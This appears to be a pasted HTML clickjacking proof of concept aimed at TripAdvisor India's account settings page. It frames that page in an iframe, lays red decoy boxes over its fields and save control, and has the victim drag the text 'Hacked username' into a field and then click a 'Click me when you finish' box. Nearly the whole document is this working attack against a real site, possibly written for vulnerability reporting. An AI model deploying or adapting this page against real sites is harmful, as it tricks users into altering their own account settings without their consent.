shrey
4 years ago in Plain Text
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 100%;
height: 585px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 46.5%;top: 24.5%;" class="xss">.</div>
<div style="height: 30px;width: 130px;left: 33%;bottom: 29%;background: #F5F;" class="xss">Click me when you finish :)</div>
<iframe style="opacity:100"src="https://www.tripadvisor.in/Settings-cp"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Hacked username')"><h3>DRAG ME TO THE RED BOX</h3></div>
</body>
</html>